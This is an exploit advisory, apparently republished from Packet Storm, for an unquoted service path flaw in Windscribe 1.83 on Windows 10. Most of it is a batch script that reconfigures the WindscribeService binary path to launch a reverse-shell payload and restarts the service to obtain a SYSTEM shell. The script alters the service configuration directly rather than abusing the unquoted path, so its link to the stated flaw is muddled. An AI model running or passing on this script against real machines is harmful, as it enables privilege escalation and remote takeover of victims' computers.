Exploit/Advisories

Published on June 30th, 2020 📆 | 2199 Views ⚑

0

Windscribe 1.83 Unquoted Service Path ≈ Packet Storm


iSpeech

Windscribe 1.83 Unquoted Service Path
Posted Jun 28, 2020
Authored by Ethan Seow

Windscribe version 1.83 suffers from an unquoted service path vulnerability.

tags | exploit
MD5 | c948a488ce14322508f062343002d507
# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
# Date: 2020-06-26
# Exploit Author: Ethan Seow
# Vendor Homepage: https://windscribe.com
# Version: v1.83 Build 20
# Tested on: Microsoft Windows 10 Home 10.0.18363 Build 18363

#filename : exploit.bat

#Code start
@echo off





sc config WindscribeService binPath="cmd /k {PATH TO REVERSE SHELL e.g.
C:UsersPublicpayload.exe}"
sc stop WindscribeService
sc start WindscribeService
echo Exploit success! SYSTEM reverse shell should be triggered :DDDDD
pause

#Code end

Source link

Tagged with:



Comments are closed.